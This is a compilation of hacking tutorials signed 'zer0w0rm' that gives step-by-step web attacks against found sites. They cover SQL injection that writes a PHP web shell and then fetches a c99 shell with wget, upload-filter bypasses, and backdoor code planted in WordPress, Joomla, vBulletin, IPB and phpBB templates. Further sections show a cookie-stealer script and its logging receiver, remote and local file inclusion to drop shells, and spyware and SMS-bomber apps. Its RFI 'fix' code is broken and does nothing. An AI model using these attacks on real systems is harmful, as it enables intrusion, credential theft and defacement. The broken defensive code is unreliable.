HOW TO UPLOAD SHELL DIRECTLY THROUGH SQL INJECTION


First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.

You need 2 main things:

Root Path of the website 
A Writable Directory 
Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/zero/public_html/admin/requires/functions.php on line 1327

Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.

www.site.com/index.php?id=10'

I am not starting with abc of SQLI I hope u know the basics. 
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is zer0w0m
Now Check File Privilages for User zer0w0rm

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='zer0w0rm'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user zero0w0rm
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.

Server Spy Addones : https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type. 

To know the webserver by file /etc/passwd use this query

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

now we have our webserver etc (/home/zero0w0rm)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/zero0w0rm.conf')4,5--

Where zero0w0rm is your webserver software name like server name.conf .

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D

site www.site.com/dir/*/*/*/*/

so its site.com/zero0w0rm/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/zero0w0rm/writeable directory/zero0w0rm.php'--+

ok now we have to execute our commands

www.site.com/zero0w0rm/writeable directory/zer0w0rm.php?cmd=pwd

www.site.com/zero0w0rm/writeable directory/zer0w0rm.php?cmd=uname -a

Now we will use wget command to upload our evil script

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to php in order to execute it :D

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=mv c99.txt c99.php

now open it

www.site.com/zero0w0rm/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

Note: In our experience, Windows servers are easy to shell with SQL queries.


Thank you (zer0w0rm)
 

Android Pen-testing tools

ANDROID PENTEST SUITE
ANDROID NETWORK TOOLKIT

Award winning Mobile Penetration Testing tool specifically built for smartphones. zANTI is the currently released version of code name ANTI (Android Network Toolkit). After over a year of beta testing with approximately 100,000 IT managers and Penetration Testers around the globe, ANTI is the first penetration testing framework for mobile devices. To further develop current security tests. which must be performed on a comprehensive professional pentest, Zimperium is going to slowly open-source parts of zANTI.

ANDROID SPY AGENT
TOTAL SMS CONTROL

The Best Mobile Spy Software for Spouse monitoring, Parental Control, Employee Tracking, Phone Security and Locator.

AGASTAYA

Having Agastya installed on your phone magically allows you to access your mobile remotely. You can access & retrieve a lot of data from your mobile phone even if you don’t have it with you. The data which could be fetched includes 1) Contacts (Fetching contact number from your Address book) 2) Call Logs (Checking Missed Calls/Received Calls/Dialed Numbers) 3) IMEI Number 4) Phone Profile (Changing profile mode to Ringer or Silent) 5) SIM Number (Retriving SIM Number) 6) SMS logs (Checking SMS's received on your phone).

SESSION HIJACKING
DROIDSHEEP

DroidSheep [Root] is an Android app for Security analysis in wireless networks and capturing facebook, twitter, linkedin and other accounts.DroidSheep was developed as a tool for testing the security of your accounts and is based on my Bachelor thesis with title “Session Hijacking on Android Devices”.

FACESNIFF

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK) It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!).

DOS ATTACK
ANDOSID

AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.

SMS BOMBER

Bomb your friends with alot of SMS in a short period Features - Unlimit number of text - Flood multiple contacts - Cancel button - No delay or periodically send - Remember last config - Easily select contacts - Counter to make sms differently - Add counter to (press menu/Counter) into each text - Download Anti SMS Bomber before bombarding :)

Download Anti SMS Bomber before bombarding :)

CONNECT & SCAN
SSHDROID

Connect through SSH to your device! SSHDroid is a SSH server implementation for Android. This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell") or edit files (through SFTP, WinSCP, Cyberduck, etc...).

FING

Fing is the ultimate toolkit for network management: * Network discovery * Service scan (TCP port scan) * Ping * Traceroute * DNS lookup * Wake on LAN * Fingbox (sync, backup, merge, monitor, notifications) * TCP connection tester * MAC address and vendor gathering * Customizable host names and icons * Connectivity detection * Geolocation * Integrated launch of third-party Apps for SSH, Telnet, FTP, FTPS, SFTP, SCP, HTTP, HTTPS, SAMBA

TEENABLE NESSUS

The Nessus Android app, from Tenable Network Security Inc., enables you to log into your Nessus scanners and start, stop and pause vulnerability scans as well as analyze the results directly from your Android device. This mobility helps improving the efficiency of your Incident Response process by letting you quickly log into a Nessus scanner from your phone to search previous scan results or check the status of an on-going scan.

HACK A DROID

This is a little suite of homemade implementations of security tools for Android composed by a router password cracker, an utility that scans for hosts in your LAN, a port scanner and a service banner grabber.

ANDROID TERMINAL EMULATOR

Access your Android's built-in Linux command line shell. Unleash your inner geek!

SNIFFERS
SHARK FOR ROOT

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

SHARK READER

Application for reading pcap files. Possible unstability/errors. Has problems with large files. Suggestions and comments are welcome. If You want traffic tagging functionality (tags packets to mark possible content), run Shark Updater. Filters: type name to include it, type -name to exclude it from list

ANONYMITY
ORBOT

Enhance your privacy, break through firewalls and communicate more safely. Orbot is the official port of Tor to Android. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet.

Note : All Apps available on play store you can download from there 

Thank you (zer0w0rm)
 

Shell Uploading Guide

Many newbie’s face problem while uploading shell on a site after getting admin access/ logging in to that site. So, I am writing this in order to help them. Basically shell gives us remote access to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we have to choose a shell that will work on the server according to the server script. If the server supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But sometimes we have to do some changes to upload a shell.

Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php, then we will rename it as shell.php.jpg or anything else.

Way 2
Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A UPLOADER SHELL FROM HERE .

WAY 3
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the shell code starts. liKe below…
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a iMage.

WAY 4
This method is more advanced. This only works for client side filters rather than server side. download firebug for Firefox, then edit the html of the upload .
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"POST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>

Change the filter accept. to *.* or just remove it completely , it will then let you upload any type of file.

WAY 5
Download “LIVE HTTP HEADERS” addon first for your firefox browser

1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site supports only jpg file. Thats why i renamed it to shell.php.jpg.)

2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell.

3. Then your Live HTTP Headers will look something similar to this


4. Then click on the shell.php.jpg, after click on Reply button. 

5. Then again a new window will open, in that window there will be two boxes, but we have to work on second box. 

6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button 


WAY 6 
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc.
"; system($_GET['cmd']); echo ?>

now rename your jpg to .php and upload. 

WAY 7 
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials on this is available in web. So I am not explaining this step by step. 

WAY 8 
All the above mention way works when we find an upload button on the site. but when there is no upload button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that link will be your shell. possibly we can find edit option in the following pages of a site…… 
Contact us.php/ Contact us.asp 
Class.php/ Class.asp 
About us.php/about us.asp 
Terms.php/terms.asp 
nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in through admin panel. They only allow file upload after logging through cpanel. 

WAY 9 
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE A SHELL FROM ANOTHER HOSTING SITE. METHOD…….. 

1) UPLOAD YOUR SHELL IN A FREE HOSTING SITE LIKE www.my3gb.com www.3owl.com , www.ripway.com , , www.000webhost.com , etc. 

2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE SITE IS www.site.com 

3) Now we have to execute this following command to gain shell access to that site. http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt 

4) REPLACE THE SITE LINK IN THE COMMAND ACCORDING TO YOUR SHELL & VULERABLE SITE LINK. 

SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES


IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS. 

1.Joomla Site: 
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager > check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit html now paste ur shell code and click save...done site.com/templates/template name/index.php like site.com/templates/beez/index.php 

2.Wordpress: 
login into admin panel expand Appearance then click on editor > u will find style.css now select 404.php on right side paste ur shell code and click edit file u can find shell in site.com/wp-content/themes/theme name u edit/404.php 

3.Vbulletin: 
1-Log in admin cp 

2-Under “Plugins & Products”, select Add New Plugin 

3-Adjust the settings as follows: Product: vBulletin Hook Location: global_start Title: (Anything …) Execution Order: 
5 Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

Plugin is Active : Yes 

4-After the plugin is added, go to the heading “Style and Design”, select “Style Manager 

5-Under whatever the default style is in the dropdown menu, select Edit Templates. 

6-Scroll ForumHome models and expand. Click [Customize] beside FORUMHOME. 

7-Search Code: 
$header Somewhere near the top. Replace it with: Code: $header $execcode

8-Now go to the forum and add after the index.php 
Code:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

So it looks like Code:
 http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

What this does is shell.txt downloads, and renames shell.php Now, the shell must be located in the directory shell.php forums … If not, then wget is disabled on that server, you can try alternative methods: 
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php


4.SMF
login into admin panel u need to download any smf theme in zip format and put ur shell.php in it and save admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php :) after upload shell will find > site.com/Themes/theme name/shell.php 

5.IPB
login admin panel > Look and Feel >Manage Languages, choose language > section (example) public_help edit: help.txt Choose topic from list, or search for a topic In right box add the below code: 
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}} 

When you add it, specify go on bottom Now we go on http://www.site.com/index.php?app=core&module=help And our code we add will be done, and you will get your shell @ www,site.com/cache/shell.php 

6.phpBB
login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html At down of:
We add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); And save it.Now go on:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shel l.txt shell find in site path/shell.php 

Mybb forum login admincp > Go to Templates and Styles, find default MyBB Theme is. Then go to Templates, expand templates that are used by the current theme. Find Calendar templates, click it. Click 'calender'. Above all the html code, paste this:


save :) shell will b find in site.com/calendar.php 
note: if u got error like "code is danger unable to edit " then simply paste ur deface code to deface calendar.php 

Thank you (zer0w0rm)
 

LDAP (Lightweight Directory Access Protocol) injections

In this tutorial I'll be discussing how a LDAP attack works.

-[ INDEX ]-----------------------------------------------
 0x01: Introduction
 0x02: Filters LDAP
 0x03: LDAP injection in Web Applications
 0x04: Links
           
           
---[ 0x01: Introduction ]

The technique of LDAP (Lightweight Directory Access Protocol) is a lightweight
protocol to access the directory service X.500. This protocol works over TCP/IP.
The access protocol LDAP is used to query and modify objects stored.


---[ 0x02: Filters LDAP ]

   
It is quite important to understand how does the LDAP filters work.(http://tools.ietf.org/html/rfc4515).

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue

   
Logical operators:
- AND "&"
- OR "|"
- NOT "!"

Relational operators:
<=, >=, =, ~=

The wildcard "*" It is used to replace characters.
   
Filter example:
(&(objectClass=user)(uid=*)): We return a list of all objects of type user, no matter
which takes the value of the attribute "uid."


---[ 0x03: LDAP injection in Web Applications ]

The technique Ldap injection is very similar to SQL injection.
The attack technique is used to operate websites built LDAP judgments directly from
data supplied by the user.

Vulnerable code with comments :

+++++++++++++++++++++++++++++++++++++

line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4:     Dim userName
line 5:     Dim filter
line 6:     Dim ldapObj
line 7:
line 8:     Const LDAP_SERVER = "ldap.example"
line 9:
line 10:     userName = Request.QueryString("user")
line 11:
line 12:     if( userName = "" ) then
line 13:         Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14:         Response.End()
line 15:     end if
line 16:
line 17:
line 18:     filter = "(uid=" + CStr(userName) + ")"        ' searching for the user entry
line 19:
line 20:
line 21:     'Creating the LDAP object and setting the base dn
line 22:     Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23:     ldapObj.ServerName = LDAP_SERVER
line 24:     ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26:     'Setting the search filter
line 27:     ldapObj.SearchFilter = filter
line 28:
line 29:     ldapObj.Search
line 30:
line 31:     'Showing the user information
line 32:     While ldapObj.NextResult = 1
line 33:         Response.Write("<p>")
line 34:
line 35:         Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36:         For i = 0 To ldapObj.AttrCount -1
line 37:             Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38:         Next
line 39:         Response.Write("</p>")
line 40:     Wend
line 41: %>
line 42: </body>
line 43: </html>

+++++++++++++++++++++++++++++++++++++


In line 10 note userName variable is initialized with the value
the parameter user and then quickly validated to see if the value is zero.
If the value is not zero, the variable userName is used to initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search to be used in
the call to SearchFilter on line 27
The attacker has full control over what will be consulted on the LDAP server.
You will get the result of the consultation when the code reaches of the line 32 to 40,
all results and its attributes are displayed to the user.

Example 1:
http://website/ldap.asp?user=*

In this example dispatched the character "*" parameter in the "user" which ends
in the variable filter.
This judgment LDAP will show any object that has an attribute uid.
We show all users and their information.

Example 2:
http://website/ldap.asp?user=zer0)(|(homedirectory=*)

It will show us the path to the user zer0.
They can do tests with the code before they leave.


---[ 0x04: Links ]

http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://es.wikipedia.org/wiki/LDAP

http://www.ldapman.org/


Thank you (zer0w0rm)
 

CSRF(Cross-Site Request Forgery) / XSRF Attacks

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery. If you say XSRF the X obviously stands for the cross, just like XSS (Cross-Site Scripting).


I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

    1) What is Cross-Site Request Forgery?
    2) How do I find CSRF vulnerabilities?
    3) How to take advantage of the IMG tag?
    4) Keep it Simple
    5) Securing yourself against CSRF
    6) Conclusion

1) What is Cross-Site Request Forgery?

I just told you guys what CSRF stands for, so it will be unnessecairy to say it twice ^^. 

When performing a CSRF attack you can inject code in a webpage, like on forums or other websites where you can post comments on whatever what. The idea is to execute a HTTP request once a user visits the affected webpage, because this attack takes place on the side of the victim (Client-Sided), the request will be executed from the machine of the victim that vists the webpage. If, for example, a user is logged in to YouTube, a link can be crafted that can be hidden on a forum, which logs you out of YouTube. 

We can go waaaay further with this by, for example, making a request to a webpage, that, upon visiting, makes a few other request by using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found in webpages with low security that allow everyone to make posts and comments. (Guests can comment) The fun part in that, is that you can create a post that can be seen by everyone visiting that page.

Though, it has to be possible to use HTML or BBCode.

The IMG Tag

A IMG tag in HTML (<img>) is often used as the following:

Code:
<img src="http://website.com/myimage.jpg">

As you may know PHP pages are also able to return images. This gives the possibility to do this, for example.

Code:
<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag.

3) How to take advantage of the IMG tag?

Yea, so how do we actually do it? Well, as I said PHP pages can also return images. Let's get to this simple scenario:

You've just found a webpage with the possibility to place comments, and you're able to use HTML within the comments. The website does not check the refer, and it's possible to use PHP extensions within the IMG tag. You write some PHP code that returns a image, but at the same time executes some Javascript too, that sends the victim to another page. If someone visits the page where you used the IMG tag, a picture will be shown, but at the same time the Javascript code is running as well. This way you can steal cookies, for example, or even write and post comments under somebody elses name.

Pretend we have the following code:

PHP Code:
<html><head><script type="text/javascript">
    var 
http GetXmlHttpObject();
    if(
http != null)
    {
      var 
url "http://mywebsite.com/cookiestealer.php?cookie=" document.cookie;
      
http.open("GET"urlfalse);
      
http.send(null);
    }

    function 
GetXmlHttpObject()
    {
      if(
window.XMLHttpRequest)
      {
      return new 
XMLHttpRequest();
      }
      if(
window.ActiveXObject)
      {
      return new 
ActiveXObject("Microsoft.XMLHTTP");
      }
      return 
null;
    }
</script></head></html> 

Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that executes a HTML request to a certain page.

If you're a little familiar with JS you can see there was make a HTTP GET request to the page mywebsite.com/cookiestealer.php. After that, a GET arguement will be given that has the value 'document.cookie'. Document.cookie will always contain the cookie of the page where the Javascript code is being executed. In this case it will steal the cookie of the user that visits the page.

On the website I've found I've uploaded the following code:

PHP Code:
<?php
    $cookie 
$_GET['cookie'];
    
$ip $_SERVER['REMOTE_ADDR'];

    
$fh fopen("log.txt"'a') or die("can't open file");
    
fwrite($fh$cookie "\n" $ip "\n\n");

    
fclose($fh);?>

This PHP code will get the value of the GET arguement and the IP address of the person visiting your page. After that the code would add this information into the file called 'log.txt'.

Every time someone visits the page where I posted the link with the IMG tag with a link to a page that executes the JS code, the code will request the cookiestealer and place the cookie in the GET arguement.

At last, you can see the cookies flow into your log. ^^

4) Keep it Simple.

In the above code I showed a kind of extensive example. Really bad secured websites with bad software have even bigger bugs than that. 

Like that you can for example first install the forum software on your local software, and look what HTTP GET request you have to make to change the password of the administrator. Pretend it's like the following:

Code:
http://forum.com/admincp/change_admin_pass.php?newpass=mynewpass123

You'd have to send that URL to the Administrator in a Private Message, in a IMG tag. If the administrator reads the message, a request will be made to the above URL and will change the Admin password to mynewpass123.

I have to say, it's often alot harder than the above example. ^^

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, stop loading images. I think this is a little devious, so I'm thinking about making an add-on that blocks all images that don't have a image-extension. Unless you allow it, ofcourse.

6) Conclusion

So what is a CSRF attack..? A CSRF attack is an attack that can be performed with less effort, if you know what you're doing, and can do alot of damage. Protecting against CSRF attacks is harder, but good to accomplish if you're working on, for example, a CMS. 



Thank you(zer0w0rm) 
 

Remote File Inclusion For web application Pentesting

Hello in this mini-tutorial i am going to show you how to use PHP shells such as c99 or other shells to hack/recover your website admin account or deface it so its for educational purposes ONLY.

ok lets start.

Step 1 - Grab yourself a C99 shell from Here.

Step 2 - You need to find a free webhost to host it without deleting your account. i prefer http://www.7host.com since they don't check your accounts Grin

Step 3 - Register on a free hosting site and upload the C99.php ofc if your a PHP programmer i suggest you password protect that using This Script.

Step 4 - Dorks to type in Google are:here

also some pages with certain variables can be vuln too but these are the most common. such can be like inurl:?buy=car.php

Step 5 - For seeing if a site is vulnerable you can try this:

Imagine a link is:

http://yoursite.com/?link=http://yoursite.com/web.php

for testing you do:

http://yoursite.com/?link=http://google.com/index.php

if Google's index page also loads in that page then its vulnerable

Step 6 - If you find a vulnerable site hat you need to do is replace that link with the C99 shell link you uploaded on your free webhost:

http://yoursite.com/?link=http://you.somefreehost.com/c99.php

and wham! the C99 page is also loaded! you can now:

    Upload Files
    Delete Files
    Move Files
    Copy Files
    DOS the site
    Deface it
    Bruteforce FTP password
    Lag it
    Redirect visitors
    Install Drive-By's
    Grab Visitor Information and test exploitation on them
    Infect Visitors ( RAT - Keylogger - Stealer )
    Execute SQL commands
    Manage SQL accounts
    Execute PHP commands
    ...


End of Tutorial

ok Now how to prevent RFI on your website or server?

RFI is caused by this:

<?php
$inc = $_GET['link'];
include($inc);
?>


To prevent that we replace strings on the include link:

<?php
$inc = $_GET['link'];
str_replace("http://", "", $inc);
str_replace("https://", "", $inc);
str_replace("www.", "", $inc);
str_replace(".php", "", $inc);
str_replace(".html", "", $inc);
str_replace(".", "", $inc);
str_replace("/", "", $inc);
str_replace("&", "", $inc);
str_replace("'", "", $inc);
str_replace(">", "", $inc);
str_replace(".com", "", $inc);
str_replace(".net", "", $inc);
str_replace(".org", "", $inc);
str_replace(".info", "", $inc);
str_replace("etc", "", $inc);
str_replace("passwd", "", $inc);
str_replace("..", "", $inc);
str_replace("...", "", $inc);
include($inc);
?>

This way not only the include page wont be vuln to RFI but also protected from many more hacking methods


Thank you (zer0w0rm)
 

Local File Inclusion Injection For web application pentesting

THERE IS 6 PARTS OF THIS TUTORIAL:::


1 Introduction
2 Finding LFI VULN. WEBSITE
3 Checking if etc/passwd is accessible
4 Checking if proc/self/environ is accessible
5 Injecting malicious code
6 Access our shell


LET'S BEGIN....

1 Introduction

In this tutorial I show you how to upload a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.


Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.


Is a step by step tutorial.


2 Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
FOR THAT I CAN PASTE HERE SOME GOOD GOOGLE DORK USING THAT YOU CAN FIND LFI VULNERABLE WEBSITES

Dorks : here

YOU CAN FIND MANY WEBSITES BUT ALL ARE NOT LFI VULNERABLE ....SO DON'T :nono: BE ANGRY....
BE COOL:cool:

EXAMPLE I CAN FIND WEBSITE ANME:

<?php
www.example.com/view.php?page=contact.php

NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT.....FOR THAT WE CAN REPLACE contact.php WITH ../ SO URL BECOME

<?php
www.example.com/view.php?page=../

AND WE GOT AN ERROR

<?php
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


IF YOU GOT AN ERROR THEN IT IS LFI VULNERABLE ...AND IF YOU CAN NOT GET ERROR OR IF YOU GET BLANK PAGE THEN IT'S NOT LFI VULNERABLE...


3 Checking if etc/passwd is accessible
 

 Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

<?php
www.example.com/view.php?page=../../../etc/passwd


we got error and no etc/passwd file
 

<?php
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


SO WE GO MORE DIRECTORIES UP

<?php
www.example.com/view.php?page=../../../../../etc/passwd


we successfully included the etc/passwd file.

<?php
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin


THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT::

<?php
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default


4 Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

<?php
www.example.com/view.php?page=../../../../../proc/self/environ


IF YOU GET SOMETHING LIKE THIS

<?php
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80



proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

5 Injecting malicious code

- Now let inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

<?php
www.example.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...

<?system('wget http://www.zer0w0rm.com/web/username/your shellname.txt -O shell.php');?>


Our command will be executed (will download the txt shell from http://www.zer0w0rm.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.
If don't work,try exec() because system() can be disabled on the webserver from php.ini

HERE "http://www.zer0w0rm.com/web/username/your shellname.txt" IS A LOCATION OF YOUR SHELL...WHICH YOU HAVE TO PUT IN TXT FILE..

IT IS NOT NECESSORAY TO UPLOAD YOUR SHELL ON DRIVE HQ...

WHAT THIS CODE DO IS UPLOAD YOU TXT FILE TO LFI VULNERABLE WEBSITE AS shell.php


6 Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.


<?php
www.example.com/shell.php

